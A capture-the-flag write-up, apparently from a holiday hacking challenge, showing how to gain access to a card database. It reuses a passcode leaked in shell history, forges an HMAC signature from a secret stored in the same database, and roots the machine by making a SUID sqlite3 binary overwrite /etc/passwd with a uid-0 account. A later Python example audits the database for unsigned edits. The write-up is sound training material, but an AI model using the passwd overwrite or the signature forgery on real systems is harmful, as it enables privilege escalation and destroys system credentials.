Hardware Hacking 101 Part 2
Santa’s gone missing, and the only way to track him is by accessing the Wish List in his chest—modify the access_cards database to gain entry!
Challenge

This is the second part of the Hardware Hacking 101 objective.

Solution
Silver medal

Hidden in Plain Sight Hints: It is so important to keep sensitive data like passwords secure. Oftentimes, when typing passwords into a CLI (Command Line Interface) they get added to log files and other easy-to-access locations. It makes it trivial to step back in history and identify the password.

We boot the system (‘Startup system default’). First, let's take a look at the command-line history:

slh@slhconsole> history
    1  cd /var/www/html
...
   10  slg --config
   11  slh --passcode CandyCaneCrunch77 --set-access 1 --id 143

We can reuse the passcode from that earlier command, this time for card 42:

slh@slhconsole> slh --passcode CandyCaneCrunch77 --set-access 1 --id 42
...
Card 42 granted access level 1.

There’s a tougher route to the Gold medal if you're up for the challenge: it involves modifying the database directly and generating your own HMAC signature.

Gold medal

It's In the Signature Hints: I seem to remember there being a handy HMAC generator included in CyberChef.

We find the SQLite database in the file system and take a closer look at it:

slh@slhconsole> ls
access_cards

slh@slhconsole> file access_cards
access_cards: SQLite 3.x database, last written using SQLite version 3040001, file counter 8, database pages 32, cookie 0x2, schema 4, UTF-8, version-valid-for 8

slh@slhconsole> sqlite3 access_cards
sqlite> .header on
sqlite> .tables
access_cards  config
sqlite> select * from config;
1|hmac_secret|9ed1515819dec61fd361d5fdabb57f41ecce1a5fe1fe263b98c0d6943b9b232e
2|hmac_message_format|{access}{uuid}
3|admin_password|3a40ae3f3fd57b2a4513cca783609589dbe51ce5e69739a33141c5717c20c9c1
4|app_version|1.0
sqlite> select * from access_cards where id=42;
id|uuid|access|sig
42|c06018b6-5e80-4395-ab71-ae5124560189|0|ecb9de15a057305e5887502d46d434c9394f5ed7ef1a51d2930ad786b02f6ffd

An HMAC (hash-based message authentication code) combines a cryptographic hash function with a secret key, and lets a verifier check both the integrity and the authenticity of the signed data.
Using the value of hmac_secret as the key and a message in the format {access}{uuid} (without the brackets), we can generate a valid signature for card 42 with access level 1 in CyberChef.


sqlite> update access_cards set access=1, sig='135a32d5026c5628b1753e6c67015c0f04e26051ef7391c2552de2816b1b7096' where id = 42;

Brilliant work! We now have access to… the Wish List! I couldn't have done it without you—thank you so much!
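As an added example (not part of the original writeup), the signature computation described above in Python, plus an audit that recomputes every card's signature from the database's own hmac_secret and reports rows whose access value was changed without re-signing. The secret, the uuids and the config column names (id, key, value) are constructed or assumed, and the key is treated as UTF-8 text rather than hex-decoded bytes.

```python
import hashlib
import hmac
import sqlite3

# Constructed sample secret (not the challenge's real hmac_secret value).
HMAC_SECRET = "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"
MESSAGE_FORMAT = "{access}{uuid}"  # the format string stored in the config table


def card_signature(secret: str, access: int, uuid: str) -> str:
    """HMAC-SHA256 of '{access}{uuid}', hex encoded. Assumption: the key is the
    secret's characters as UTF-8 text (CyberChef key type UTF8), not hex-decoded."""
    message = MESSAGE_FORMAT.format(access=access, uuid=uuid)
    return hmac.new(secret.encode(), message.encode(), hashlib.sha256).hexdigest()


def signature_valid(secret: str, access: int, uuid: str, sig: str) -> bool:
    """Constant-time comparison so a verifier leaks nothing about the expected sig."""
    return hmac.compare_digest(card_signature(secret, access, uuid), sig)


def build_sample_db() -> sqlite3.Connection:
    """In-memory copy of the two tables with constructed rows; the config column
    names (id, key, value) are assumed, the writeup only shows the values."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE config (id INTEGER, key TEXT, value TEXT);"
        "CREATE TABLE access_cards (id INTEGER, uuid TEXT, access INTEGER, sig TEXT);"
    )
    conn.execute("INSERT INTO config VALUES (1, 'hmac_secret', ?)", (HMAC_SECRET,))
    for card_id, uuid in [(7, "11111111-2222-3333-4444-555555555555"),
                          (42, "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee")]:
        conn.execute("INSERT INTO access_cards VALUES (?, ?, 0, ?)",
                     (card_id, uuid, card_signature(HMAC_SECRET, 0, uuid)))
    # Simulate the writeup's access change, but without re-signing the row.
    conn.execute("UPDATE access_cards SET access = 1 WHERE id = 42")
    conn.commit()
    return conn


def audit_cards(conn: sqlite3.Connection) -> list[int]:
    """Ids whose stored sig no longer matches access+uuid under the DB's own secret."""
    (secret,) = conn.execute("SELECT value FROM config WHERE key = 'hmac_secret'").fetchone()
    rows = conn.execute("SELECT id, uuid, access, sig FROM access_cards")
    return [cid for cid, uuid, access, sig in rows
            if not signature_valid(secret, access, uuid, sig)]
```

Note the design flaw the writeup exploits: because hmac_secret lives in the same database as the rows it signs, anyone who can write the file can also re-sign a forged row, so this audit only catches edits made without the key.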

Platinum medal

I found a way to fully root the machine. It relies on sqlite3 being installed with the SUID root bit set (see GTFOBins): we use its built-in file-output command to overwrite /etc/passwd and gain root access.

slh@slhconsole> LFILE=/etc/passwd
slh@slhconsole> sqlite3 /dev/null -cmd ".output $LFILE" 'select "user3:ghTC5HTjVd/7M:0:0:root:/root:/bin/bash";'
slh@slhconsole> su user3
(password: 123)
Password: 
bash: cannot set terminal process group (9): Inappropriate ioctl for device
bash: no job control in this shell
user3@1a0597267c1e:/home/slh# id -a
uid=0(user3) gid=0(root) groups=0(root)
user3@1a0597267c1e:/home/slh#